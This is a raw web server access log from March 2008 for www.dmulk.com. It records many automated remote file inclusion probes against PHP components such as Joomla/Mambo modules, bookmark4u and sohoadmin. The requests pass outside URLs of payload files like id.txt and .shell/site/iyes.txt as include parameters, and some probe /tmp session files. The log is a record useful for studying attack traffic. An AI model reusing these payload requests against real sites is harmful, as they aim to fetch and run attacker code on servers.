212.47.220.175 - - [27/Mar/2008:07:20:28 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
221.224.6.43 - - [27/Mar/2008:07:20:28 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.224.6.43 - - [27/Mar/2008:07:20:29 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.224.6.43 - - [27/Mar/2008:07:20:29 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:07:20:44 -0700] "GET /logs/access_080214.log//confirm.php?include_location=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:07:20:44 -0700] "GET //confirm.php?include_location=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:07:20:44 -0700] "GET /logs//confirm.php?include_location=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.47.220.175 - - [27/Mar/2008:07:21:14 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://h1.ripway.com/peler88/31377albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [27/Mar/2008:07:21:40 -0700] "GET /index.php?option=com_easygallery&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.244.134.196 - - [27/Mar/2008:07:22:03 -0700] "GET /logs/access_080131.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ritterspektakel-leipzig.de/administrator/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.244.134.196 - - [27/Mar/2008:07:22:04 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ritterspektakel-leipzig.de/administrator/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.244.134.196 - - [27/Mar/2008:07:22:04 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ritterspektakel-leipzig.de/administrator/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.99.30.69 - - [27/Mar/2008:07:22:06 -0700] "GET /tmp/sess_af284cda9e69344327a3301093427fa9 HTTP/1.0" 403 163 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.dmulk.com"
211.144.35.238 - - [27/Mar/2008:07:22:25 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.244.134.196 - - [27/Mar/2008:07:22:29 -0700] "GET /logs/access.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ritterspektakel-leipzig.de/administrator/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.244.134.196 - - [27/Mar/2008:07:22:30 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ritterspektakel-leipzig.de/administrator/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.244.134.196 - - [27/Mar/2008:07:22:30 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ritterspektakel-leipzig.de/administrator/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.86.238.86 - - [27/Mar/2008:07:22:31 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://statesidelogistics.com/images/r7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.47.220.175 - - [27/Mar/2008:07:22:47 -0700] "GET /logs/access_080211.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://bnb-chambresdhotes.ch/components/com_easygallery/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.47.220.175 - - [27/Mar/2008:07:22:47 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://bnb-chambresdhotes.ch/components/com_easygallery/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.47.220.175 - - [27/Mar/2008:07:22:47 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://bnb-chambresdhotes.ch/components/com_easygallery/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.47.220.175 - - [27/Mar/2008:07:22:47 -0700] "GET /logs/access_080211.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.47.220.175 - - [27/Mar/2008:07:22:48 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.47.220.175 - - [27/Mar/2008:07:22:48 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.47.220.175 - - [27/Mar/2008:07:22:52 -0700] "GET /logs/access_080211.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.47.220.175 - - [27/Mar/2008:07:22:52 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.47.220.175 - - [27/Mar/2008:07:22:53 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.99.30.59 - - [27/Mar/2008:07:24:01 -0700] "GET /tmp/sess_d7b034742e4cba968532c244ef970fc6 HTTP/1.0" 403 163 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.dmulk.com"
87.118.102.153 - - [27/Mar/2008:07:24:07 -0700] "GET /logs/index.php?option=com_jmsitemap&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
87.118.102.153 - - [27/Mar/2008:07:24:07 -0700] "GET /index.php?option=com_jmsitemap&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
89.111.176.28 - - [27/Mar/2008:07:24:53 -0700] "GET /logs//hack//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://beta.bluesite.communicode.de/scripte/smarty/internals/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.99.30.71 - - [27/Mar/2008:07:25:37 -0700] "GET /tmp/sess_21e1180ce7c747ac04075706b8c40ab2 HTTP/1.0" 403 163 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.dmulk.com"
67.19.107.122 - - [27/Mar/2008:07:26:27 -0700] "GET /logs/access_080213.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.99.30.40 - - [27/Mar/2008:07:26:28 -0700] "GET /megumi/Necklace/?N=D HTTP/1.0" 200 4307 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.dmulk.com"
209.168.161.227 - - [27/Mar/2008:07:26:48 -0700] "GET //index.php?option=com_search=§ionid=&id=&mosConfig_absolute_path=http://brotherhoodlounge.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.99.30.54 - - [27/Mar/2008:07:27:32 -0700] "GET /megumi/Necklace/?M=A HTTP/1.0" 200 4307 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.dmulk.com"
221.224.6.43 - - [27/Mar/2008:07:28:55 -0700] "GET /logs/access_080313.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [27/Mar/2008:07:29:08 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
160.99.12.231 - - [27/Mar/2008:07:29:09 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
213.252.17.105 - - [27/Mar/2008:07:29:25 -0700] "GET /logs/access_080117.log/sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://www.glowacz.de/data/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.252.17.105 - - [27/Mar/2008:07:29:25 -0700] "GET /sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://www.glowacz.de/data/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.252.17.105 - - [27/Mar/2008:07:29:25 -0700] "GET /logs/sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://www.glowacz.de/data/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.252.17.105 - - [27/Mar/2008:07:29:27 -0700] "GET /logs/access_080131.log/sohoadmin/client_files/shopping_cart/pgm-shopping_css.inc.php?_SESSION[docroot_path]=http://www.glowacz.de/data/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.244.134.196 - - [27/Mar/2008:07:29:35 -0700] "GET /logs/access_080312.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.ritterspektakel-leipzig.de/administrator/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.236.198.80 - - [27/Mar/2008:07:29:48 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.236.198.80 - - [27/Mar/2008:07:29:49 -0700] "GET //index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.236.198.80 - - [27/Mar/2008:07:29:50 -0700] "GET /logs//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
64.191.104.107 - - [27/Mar/2008:07:29:52 -0700] "GET /logs/access_080119.log/modules/My_eGallery/index.php?basepath=http://www.visitecuador.travel/downloads/jancok.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.104.107 - - [27/Mar/2008:07:29:52 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.visitecuador.travel/downloads/jancok.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.104.107 - - [27/Mar/2008:07:29:52 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.visitecuador.travel/downloads/jancok.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.163.146.219 - - [27/Mar/2008:07:30:11 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.163.146.219 - - [27/Mar/2008:07:30:11 -0700] "GET //index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.163.146.219 - - [27/Mar/2008:07:30:12 -0700] "GET /logs//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.236.198.80 - - [27/Mar/2008:07:30:15 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
62.75.164.16 - - [27/Mar/2008:07:30:15 -0700] "GET /logs/access_071209.log//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.236.198.80 - - [27/Mar/2008:07:30:16 -0700] "GET //index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
62.75.164.16 - - [27/Mar/2008:07:30:16 -0700] "GET //index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.164.16 - - [27/Mar/2008:07:30:16 -0700] "GET /logs/access_071209.log//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.163.146.219 - - [27/Mar/2008:07:30:16 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.164.16 - - [27/Mar/2008:07:30:16 -0700] "GET /logs//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.236.198.80 - - [27/Mar/2008:07:30:16 -0700] "GET /logs//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
62.75.164.16 - - [27/Mar/2008:07:30:16 -0700] "GET //index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.164.16 - - [27/Mar/2008:07:30:17 -0700] "GET /logs//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.163.146.219 - - [27/Mar/2008:07:30:18 -0700] "GET //index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.163.146.219 - - [27/Mar/2008:07:30:18 -0700] "GET /logs//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.9.78.190 - - [27/Mar/2008:07:30:52 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.36.241.244 - - [27/Mar/2008:07:31:03 -0700] "GET /logs/access.log/index.php?option=com_easygallery&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.36.241.244 - - [27/Mar/2008:07:31:04 -0700] "GET /logs/index.php?option=com_easygallery&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.191.104.107 - - [27/Mar/2008:07:31:10 -0700] "GET /logs/access_071227.log/modules/My_eGallery/index.php?basepath=http://www.visitecuador.travel/downloads/jancok.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.236.198.80 - - [27/Mar/2008:07:31:38 -0700] "GET /logs/access_071209.log//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.236.198.80 - - [27/Mar/2008:07:31:40 -0700] "GET /logs/access_071209.log//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.163.146.219 - - [27/Mar/2008:07:31:45 -0700] "GET /logs/access_071209.log//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.163.146.219 - - [27/Mar/2008:07:31:45 -0700] "GET /logs/access_071209.log//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.163.146.219 - - [27/Mar/2008:07:32:53 -0700] "GET /logs/access_080215.log//index.php?option=com_dbquery=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.163.146.219 - - [27/Mar/2008:07:32:54 -0700] "GET //index.php?option=com_dbquery=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.163.146.219 - - [27/Mar/2008:07:32:54 -0700] "GET /logs//index.php?option=com_dbquery=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.163.146.219 - - [27/Mar/2008:07:33:00 -0700] "GET /logs/access_080215.log//index.php?option=com_dbquery=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.163.146.219 - - [27/Mar/2008:07:33:00 -0700] "GET //index.php?option=com_dbquery=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.163.146.219 - - [27/Mar/2008:07:33:01 -0700] "GET /logs//index.php?option=com_dbquery=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.163.146.219 - - [27/Mar/2008:07:33:23 -0700] "GET /logs/access_080313.log//index.php?option=com_dbquery=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.163.146.219 - - [27/Mar/2008:07:33:23 -0700] "GET /logs/access_080313.log//index.php?option=com_dbquery=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.164.16 - - [27/Mar/2008:07:33:34 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.164.16 - - [27/Mar/2008:07:33:34 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.244.134.196 - - [27/Mar/2008:07:33:36 -0700] "GET /logs/access_071216.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ritterspektakel-leipzig.de/administrator/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
160.99.12.231 - - [27/Mar/2008:07:34:05 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
160.99.12.231 - - [27/Mar/2008:07:34:06 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
209.200.254.233 - - [27/Mar/2008:07:34:14 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.111.176.28 - - [27/Mar/2008:07:34:25 -0700] "GET /logs/access_080219.log//hack//components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://beta.bluesite.communicode.de/scripte/smarty/internals/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.174.84.65 - - [27/Mar/2008:07:34:25 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.motoxclub.org.au/forum/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
202.174.84.65 - - [27/Mar/2008:07:34:26 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.motoxclub.org.au/forum/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
87.236.198.80 - - [27/Mar/2008:07:34:45 -0700] "GET /logs/access_080215.log//index.php?option=com_dbquery=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.236.198.80 - - [27/Mar/2008:07:34:46 -0700] "GET //index.php?option=com_dbquery=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.236.198.80 - - [27/Mar/2008:07:34:46 -0700] "GET /logs/access_080215.log//index.php?option=com_dbquery=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.236.198.80 - - [27/Mar/2008:07:34:47 -0700] "GET /logs//index.php?option=com_dbquery=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.236.198.80 - - [27/Mar/2008:07:34:47 -0700] "GET //index.php?option=com_dbquery=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.236.198.80 - - [27/Mar/2008:07:34:47 -0700] "GET /logs//index.php?option=com_dbquery=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
62.75.164.16 - - [27/Mar/2008:07:34:52 -0700] "GET /logs/access_080215.log//index.php?option=com_dbquery=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.164.16 - - [27/Mar/2008:07:34:52 -0700] "GET /logs/access_080215.log//index.php?option=com_dbquery=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.164.16 - - [27/Mar/2008:07:34:53 -0700] "GET //index.php?option=com_dbquery=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.164.16 - - [27/Mar/2008:07:34:53 -0700] "GET //index.php?option=com_dbquery=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.164.16 - - [27/Mar/2008:07:34:53 -0700] "GET /logs//index.php?option=com_dbquery=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.164.16 - - [27/Mar/2008:07:34:53 -0700] "GET /logs//index.php?option=com_dbquery=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.164.16 - - [27/Mar/2008:07:35:13 -0700] "GET /logs/access_080313.log//index.php?option=com_dbquery=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.164.16 - - [27/Mar/2008:07:35:14 -0700] "GET /logs/access_080313.log//index.php?option=com_dbquery=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.18.207.65 - - [27/Mar/2008:07:35:20 -0700] "GET /logs/access.log//init_basic.php?GALLERY_BASEDIR=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [27/Mar/2008:07:35:20 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.65 - - [27/Mar/2008:07:35:21 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.236.198.80 - - [27/Mar/2008:07:35:21 -0700] "GET /logs/access_080313.log//index.php?option=com_dbquery=§ionid=&id=&mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
